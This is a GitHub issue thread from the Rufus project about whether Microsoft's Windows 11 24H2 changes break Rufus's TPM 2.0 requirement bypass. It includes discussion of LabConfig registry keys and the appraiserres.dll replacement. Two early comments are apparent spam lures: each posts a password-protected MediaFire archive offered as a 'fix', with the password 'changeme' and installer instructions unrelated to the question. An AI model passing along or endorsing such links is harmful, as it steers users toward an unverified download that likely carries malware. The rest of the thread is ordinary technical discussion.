pbatard/rufus #2554: TPM 2.0 bypass will continue to work?

AntonioRedondo, 2024-08-28:
It seems that Microsoft is tightening the bypass of the TPM 2.0 requirement in upcoming Windows 11 versions.

I wonder how this news affects Rufus ability to perform the TPM trick.

<a href="https://www.windowscentral.com/software-apps/windows-11/microsoft-seals-tpm-20-loophole-again">[Microsoft patches TPM 2.0 trick preventing Windows 11 installs on unsupported devices | Windows Central](https://www.windowscentral.com/software-apps/windows-11/microsoft-seals-tpm-20-loophole-again)</a>

bkballoon, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

thecatontheceiling, 2024-08-28:
Rufus bypass works for 24H2 ISO's and also I think the latest insider ISO's as well (27686+) only when you're clean installing windows. If you try to do an upgrade it'll still check for requirements.

thecatontheceiling, 2024-08-28:
Also Microsoft didn't patch the bypasses intentionally. 

They fixed a bug in the upgrade installer and it led to some (yes, some) bypasses for upgrading being patched.

closed 2024-08-28 by pbatard

thecatontheceiling, 2024-08-28:
24H2 has already hit RTM and they aren't going to be making a new build, so everything that is true now will be true during the "formal" release as well

thecatontheceiling, 2024-08-28:
> If I remember correctly Rufus uses Labconfig for the bypasses (so unless Microsoft plans to deactivate the Labconfig registry keys, the bypasses Rufus uses shouldn’t be affected)

It also replaced appraiserres.dll with an empty file for bypassing requirements when upgrading but that won't work on 24H2 and canary

pbatard, 2024-08-28:
> they aren't going to be making a new build, so everything that is true now will be true during the "formal" release as well

Then https://github.com/pbatard/rufus/wiki/FAQ#user-content-Do_you_plan_to_work_around_the_new_hardware_requirements_limitations_of_Windows_11_24H2 applies.

As far as I'm concerned, anything that hasn't hit **actual** GA is 100% still subject to modification especially if, like Microsoft does, there's going to be **MONTHS** between RTM and GA. Heck, considering how many `v1` re-releases we've seen on GA less than a few days after GA, I'd say that even a Microsoft GA should not be considered _final_ software at this stage...